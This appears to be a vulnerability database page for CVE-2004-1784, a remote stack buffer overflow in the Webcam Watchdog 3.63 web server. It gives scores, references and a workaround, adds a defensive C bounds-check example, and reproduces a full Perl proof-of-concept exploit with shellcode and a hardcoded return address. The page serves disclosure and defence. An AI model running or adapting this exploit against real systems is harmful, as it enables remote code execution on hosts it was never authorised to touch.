CVE-2004-1784
CVSS 7.5
Published: 2004-01-03 00:00:00
Revised: 2008-09-05 16:42:20

[Original] Buffer overflow in the web server of Webcam Watchdog 3.63 allows remote attackers to execute arbitrary code via a long HTTP GET request.


[CNNVD] Webcam Corp Webcam Watchdog Web Server Remote Buffer Overflow Vulnerability (CNNVD-200401-002)

Webcam Watchdog is a full-featured remote digital surveillance system that provides network monitoring, digital video recording and live network broadcasting.
The web server component of Webcam Watchdog performs no bounds checking on overlong HTTP GET requests. A remote attacker can exploit this to cause a buffer overflow and possibly execute arbitrary instructions on the system with the privileges of the web process.
Submitting an HTTP GET request longer than 234 characters to port 80, on which Webcam Watchdog listens, triggers the buffer overflow; with carefully constructed data, arbitrary instructions may be executed on the system with the privileges of the web process.
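As an added illustration from the defender's side (this is not Webcam Watchdog's code, which is not shown on this page), the following C parser contains the bounds check the advisory says the web server lacks: the request path is measured and rejected before it is copied into a fixed-size buffer. The 234-byte cap, the function names and the constructed request lines are assumptions taken from the figures above.

```c
#include <stdio.h>
#include <string.h>
/* Cap on the request path: 234 is the length the advisory cites (assumption: used as the limit). */
#define PATH_MAX_LEN 234
enum { REQ_OK = 0, REQ_MALFORMED = -1, REQ_TOO_LONG = -2 };

/* Parse "GET <path> HTTP/1.x" into out_path (capacity out_cap, NUL included). The length
 * is checked before anything is copied, the check the vulnerable server lacked. */
int parse_request_line(const char *line, char *out_path, size_t out_cap)
{
    const char *p = line, *end;
    size_t len;
    if (strncmp(p, "GET ", 4) != 0)
        return REQ_MALFORMED;
    p += 4;
    end = strchr(p, ' ');                 /* the path ends at the next space */
    if (end == NULL || end == p || strncmp(end + 1, "HTTP/1.", 7) != 0)
        return REQ_MALFORMED;
    len = (size_t)(end - p);
    if (len > PATH_MAX_LEN || len + 1 > out_cap)
        return REQ_TOO_LONG;              /* rejected, never written past the buffer */
    memcpy(out_path, p, len);
    out_path[len] = '\0';
    return REQ_OK;
}

/* Parse into a static buffer sized exactly to the cap. */
int parse_line(const char *line)
{
    static char path[PATH_MAX_LEN + 1];
    return parse_request_line(line, path, sizeof path);
}

/* Build "GET /aaa...a HTTP/1.1" with n 'a's (constructed, the shape of the PoC request) and parse it. */
int check_path_of_length(size_t n)
{
    char line[600];                       /* n is capped so this demo buffer stays safe */
    if (n > 500)
        return REQ_MALFORMED;
    memcpy(line, "GET /", 5);
    memset(line + 5, 'a', n);
    memcpy(line + 5 + n, " HTTP/1.1", 10);  /* 10 bytes copies the NUL too */
    return parse_line(line);
}
int main(void)
{
    printf("234-char path -> %d (0 = ok), 235-char path -> %d (-2 = too long)\n",
           check_path_of_length(233), check_path_of_length(234));
    return 0;
}
```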

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:webcam_corp:webcam_watchdog:1.1
cpe:/a:webcam_corp:webcam_watchdog:3.63
cpe:/a:webcam_corp:webcam_watchdog:1.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1784
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1784
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200401-002
(official data source) CNNVD

- Other links and resources

http://secunia.com/advisories/10527
(VENDOR_ADVISORY)  SECUNIA  10527
http://xforce.iss.net/xforce/xfdb/14131
(VENDOR_ADVISORY)  XF  webcam-watchdog-get-bo(14131)
http://www.webcamsoft.com/en/watchdog_h.html
(UNKNOWN)  MISC  http://www.webcamsoft.com/en/watchdog_h.html
http://www.securityfocus.com/bid/9351
(VENDOR_ADVISORY)  BID  9351
http://www.securityfocus.com/archive/1/348818
(VENDOR_ADVISORY)  BUGTRAQ  20040103 Webcam Watchdog Stack Overflow Vulnerability
http://www.osvdb.org/3312
(VENDOR_ADVISORY)  OSVDB  3312
http://www.elitehaven.net/webcamwatchdog.txt
(UNKNOWN)  MISC  http://www.elitehaven.net/webcamwatchdog.txt

- Vulnerability information

Webcam Corp Webcam Watchdog Web Server Remote Buffer Overflow Vulnerability
High risk  Boundary condition error
2004-01-03 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

Vendor patches:
Webcam Corp
-----------
The vendor has not yet released a patch or upgrade; users of this software are advised to monitor the vendor's homepage for the latest version:

http://www.webcamsoft.com/en/watchdog.html

- Vulnerability information (23514)

Webcam Corp Webcam Watchdog 1.0/1.1/3.63 Web Server Buffer Overflow Vulnerability (EDBID:23514)
windows remote
2004-01-04 Verified
0 Peter Winter-Smith
N/A
source: http://www.securityfocus.com/bid/9351/info

A problem has been identified in the handling of remote web requests by the Webcam Watchdog software. Because of this, it may be possible for a remote attacker to gain unauthorized access to a vulnerable system. 

#!/usr/bin/perl -w
#
# Stack Overflow in Webcam Watchdog - Proof of Concept Exploit
#
# - Tested on version 3.63 - MessageBoxA Shellcode
#
# - By Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket;

if(!($ARGV[1]))
{
 print "\nUsage: wcwdpoc.pl <test_system> <port>\n" .
       "\tDefault port is 80\n\n";
 exit;
}

print "\nWebcam Watchdog 3.63 Stack Overflow PoC\n";


$target = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
                            or die "Unable to connect to $ARGV[0] on port $ARGV[1]";

$shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90" .
                        "\xEB\x5D\x5F\x55\x89\xE5\x81\xC4" .
                        "\xF0\xFF\xFF\xFF\x57\xFC\xB0\xFE" .
                        "\xF2\xAE\x80\x47\xFF\x30\x5F\x57" .
                        "\x31\xD2\xB9\xFF\xFF\xFF\xFF\xB2" .
                        "\x05\xB0\xFF\xF2\xAE\xFE\x47\xFF" .
                        "\x57\xFE\xCA\x80\xFA\x01\x75\xF3" .
                        "\x81\xEC\xFC\xFF\xFF\xFF\x89\xE3" .
                        "\xFF\x73\x0C\xBE\xFF\xEC\x59\x42" .
                        "\xC1\xEE\x08\xFF\x16\xFF\x73\x08" .
                        "\x50\xBE\xFF\xE4\x59\x42\xC1\xEE" .
                        "\x08\xFF\x16\x31\xC9\x51\xFF\x73" .
                        "\x04\xFF\x33\x51\xFF\xD0\xCC\x90" .
                        "\xE8\x9D\xFF\xFF\xFF\x75\x73\x65" .
                        "\x72\x33\x32\xFE\x64\x6C\x6C\xFF" .
                        "\x4D\x65\x73\x73\x61\x67\x65\x42" .
                        "\x6F\x78\x41\xFF\x57\x61\x72\x6E" .
                        "\x69\x6E\x67\x21\xFF\x54\x68\x69" .
                        "\x73\x5F\x76\x65\x72\x73\x69\x6F" .
                        "\x6E\x5F\x6F\x66\x5F\x57\x65\x62" .
                        "\x63\x61\x6D\x5F\x57\x61\x74\x63" .
                        "\x68\x64\x6F\x67\x5F\x69\x73\x5F" .
                        "\x76\x75\x6C\x6E\x65\x72\x61\x62" .
                        "\x6C\x65\x5F\x74\x6F\x5F\x72\x65" .
                        "\x6D\x6F\x74\x65\x5F\x63\x6F\x6D" .
                        "\x70\x72\x6F\x6D\x69\x73\x65\x21" .
                        "\xFF";

$ebp = "BBBB";
$eip = "\x59\xAE\xE9\x77"; # WinXP Home SP1 'kernel32.dll' - 'call esp'

$badpage = "a"x234 . $ebp . $eip . $shellcode;

$request = "GET /" . $badpage. " HTTP/1.1\r\n" .
           "User-Agent: WCSAXRView\r\n" .
           "Host: 127.0.0.1\r\n" .
           "Cache-Control: no-cache\r\n\r\n";

print $target $request;

print " + Testing remote system\n + MessageBox should appear if vulnerable!\n";

sleep(2);

close($target);

print "Done.\n";
exit;
		

- Vulnerability information

3312
Webcam Watchdog Web Interface HTTP GET Request Handling Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

A remote overflow exists in Webcam Watchdog. The web interface fails to perform proper boundary checking; with a specially crafted request, an attacker can trigger an overflow that may allow arbitrary code execution, resulting in a loss of confidentiality and integrity.

- Timeline

2004-01-05 Unknown
Unknown Unknown

- Solution

Upgrade to version 3.64 or higher, as it has been reported to fix this vulnerability. However, the vendor has not confirmed these findings. It is also possible to mitigate the flaw by implementing the following workaround(s): 1.) Restrict access to the web interface, allowing only trusted IP addresses to connect. 2.) Disable the remote viewing web interface.

- Related references

- Vulnerability author

Unknown or Incomplete